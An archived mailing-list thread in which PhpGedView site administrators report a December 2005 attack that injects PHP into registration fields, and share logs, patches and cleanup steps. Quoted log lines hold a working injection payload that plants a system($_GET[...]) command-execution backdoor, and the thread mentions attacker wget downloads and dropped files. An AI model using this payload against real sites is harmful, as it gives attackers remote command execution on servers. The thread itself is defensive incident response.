Thread: Re: [Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
phpgedview-talk
|
From: Hernan J. L. <he...@mu...> - 2005-12-20 20:44:02
|
Intento de ingresar. Habia actualizado el archivo 20' antes y bloqueado IP's.
Pero entro a traves de este IP. La version actualmente instalada es la
3.3.7 . Ya borre al usuario que no se habia autoverificado aun. Si alguien
puede traducirlo para el resto de los usuarios, agradecido porque mi ingles
es muy malo como para explicar esto.
Saludos
Hernan Lopez
Este el Log
20.12.2005 17:25:07 - 201.236.15.145 - Login Failed ->HiMaster!<?php
system($_GET[suntzu]);die;?><-
20.12.2005 17:25:14 - 201.236.15.145 - User registration requested for:
SUNTZU1914
20.12.2005 17:25:14 - 201.236.15.145 - Anonymous user added user ->
SUNTZU1914 <-
----- Original Message -----
From: Heike El-Ashi - Tromp <hei...@ya...>
To: php...@li...
Date: Tue, 20 Dec 2005 21:20:49 +0100 (CET)
Subject: Re: [Phpgedview-talk] attack attempt
> thanks for info. As my pc is not linux-operated I assume no harm was done.
> Checked my phpGedView-log and saw that the hacker failed to login.
> Uploaded the patch anyway.
> Heike
>
> Matthew Gates <ma...@po...> schrieb:
> wget is a command line tool for downloading web pages. You can use it for
> mirroring pages (making local copies of pages) and all sorts. It's a very
> useful little tool, and is commonly installed on unix-like operating
> systems. In this case the attacker is trying to use it to download some
> program (to do something - who knows what, but I bet it's not friendly).
>
> On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> > Hi Matthew,
> > had an attack also.
> > I am using 3.2.2. final.
> > What is this wget?
> > Regards,
> > Heike
> >
> > Matthew Gates schrieb:
> > Hi all,
> >
> > I had a curious user request on my phpGedView site. Looks like they're
> > attempting some PHP injection style attack, using PHP code in the email
> > address and other field in the user table, like this:
> >
> > \';error_reporting(0);if(isset($suntzu))
> > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
> >
> > >From my log files it looks like the attacker was trying to download a
> > > linux
> >
> > binary and a PHP script using wget. I grabbed the target files and can
> > provide a sample if anyone is interested in trying to un-pick what they do
> > (know a good linux dis-assembler?).
> >
> > Doesn't look like they managed to do anything nasty, probably because wget
> > isn't available on my server. Just a heads up for everyone to keep an eye
> > out. Grep your logs for wget.
> >
> > I reported the incident to SANS and they said they have seen it and sent
> > me this link, which looks like a published version of the exploit:
> >
> > http://www.milw0rm.com/id.php?id=1379
> >
> > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> > final, so I think I would have been infected if I had had wget installed.
> > Watch yourselves!
> >
> > I'm guessing we need a patch of some sort.
> >
> > Regards,
>
>
> -------------------------------------------------------
> This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
> for problems? Stop! Download the new AJAX search engine that makes
> searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
> http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
> _______________________________________________
> Phpgedview-talk mailing list
> Php...@li...
> https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
>
>
>
>
> ---------------------------------
> Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005.
>
> ---------------------------------
> Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005.
>
|
|
From: John F. <Joh...@ne...> - 2005-12-20 21:42:18
|
So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
|
From: John F. <Joh...@ne...> - 2005-12-20 21:43:12
|
Forgot to mention that you should look in the index directory for these or any other odd files. --John -----Original Message----- From: John Finlay=20 Sent: Tuesday, December 20, 2005 2:41 PM To: 'php...@li...' Subject: RE: [Phpgedview-talk] attack attempt So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
|
From: John F. <Joh...@ne...> - 2005-12-20 21:45:53
|
You should also delete any 'suntzu' users that happen to be created in your pgv_users table. A quick sql line to do this is: delete from pgv_users where u_username like 'suntzu%'; --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: Tuesday, December 20, 2005 2:42 PM To: John Finlay; php...@li... Subject: RE: [Phpgedview-talk] attack attempt Forgot to mention that you should look in the index directory for these or any other odd files. --John -----Original Message----- From: John Finlay=20 Sent: Tuesday, December 20, 2005 2:41 PM To: 'php...@li...' Subject: RE: [Phpgedview-talk] attack attempt So far the files that I have seen them try to use are: kn rs.php cbl.pl I have also added an updated login_register.php to the patch files which will prevent the user registration from occurring. https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1386434&gro= up_ id=3D55456&atid=3D477081 --John -----Original Message----- From: php...@li... [mailto:php...@li...] On Behalf Of Tastiger Sent: Tuesday, December 20, 2005 2:39 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same=20 attack - so I'm wondering if they have managed to inject a file somewhere? ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_idv37&alloc_id=16865&op=3Dick _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
|
From: S.C. G. <alp...@gm...> - 2005-12-20 22:26:02
|
I have just been attacked by the same fellow.... new ip tho. same code for email... My site is unpatched too, it's only been up for 6hours. IP ADDRESS: 65.118.243.76 DNS LOOKUP: curlyjoe.sd.stargateinc.net -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: S.C. G. <alp...@gm...> - 2005-12-20 22:33:04
|
When I went to goto user admin and delete him, i got this error;
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){s=
y
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
I run my own server via dynamic DNS... I closed my firewall in time i hope,
I'll let you know.
--
---S.C. Gehl, 'Beauty to Burn'
|
|
From: Tastiger <tas...@sc...> - 2005-12-20 23:18:45
|
At 08:44 21/12/2005, you wrote: >You should also delete any 'suntzu' users that happen to be created in >your pgv_users table. It's no use just deleting them via the Admin panel they just keep coming back |
|
From: John F. <Joh...@ne...> - 2005-12-20 22:36:34
|
You will need to manually delete the suntzu user from the pgv_users
table.
=20
--John
=20
________________________________
From: php...@li...
[mailto:php...@li...] On Behalf Of S.C.
Gehl
Sent: Tuesday, December 20, 2005 3:33 PM
To: php...@li...
Subject: Re: [Phpgedview-talk] attack attempt
=20
When I went to goto user admin and delete him, i got this error;
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
I run my own server via dynamic DNS... I closed my firewall in time i
hope, I'll let you know.
--=20
---S.C. Gehl, 'Beauty to Burn'=20
|
|
From: Rodney H. <rm...@rm...> - 2005-12-20 22:57:02
|
I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: John F. <Joh...@ne...> - 2005-12-20 23:03:41
|
If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. =20 --John =20 =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt =20 I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: =20 Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 =20 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ =20 =20 =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt =20 When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. --=20 ---S.C. Gehl, 'Beauty to Burn'=20 |
|
From: Rodney H. <rm...@rm...> - 2005-12-20 23:16:02
|
Sorry John, Just fixed it by deleting all the Index folder and restoring from my backup, just done last night, as it happens. There was a lot of guff in the authenticate.php with suntzu intermixed, but I don't have it now. I have applied the two patches you published and blocked 3 URLs in my .htaccess. Regards -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 23:02 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: Rodney H. <rm...@rm...> - 2005-12-20 23:30:25
|
Further to my last, now when I log into my Welcome page, I am denied editing and when I log out of my Welcome page, I get at the top of the page:- Notice: Undefined index: fullname in /home/domain/domain60/web/tree2/includes/authentication_index.php on line 300 Unable to write to ./index/authenticate.php Notice: Undefined index: download_here in /home/domain/domain60/web/tree2/includes/authentication_index.php on line 322 Warning: Cannot modify header information - headers already sent by (output started at /home/domain/domain60/web/tree2/includes/authentication_index.php:300) in /home/domain/domain60/web/tree2/includes/functions_print.php on line 562 _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 23:02 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X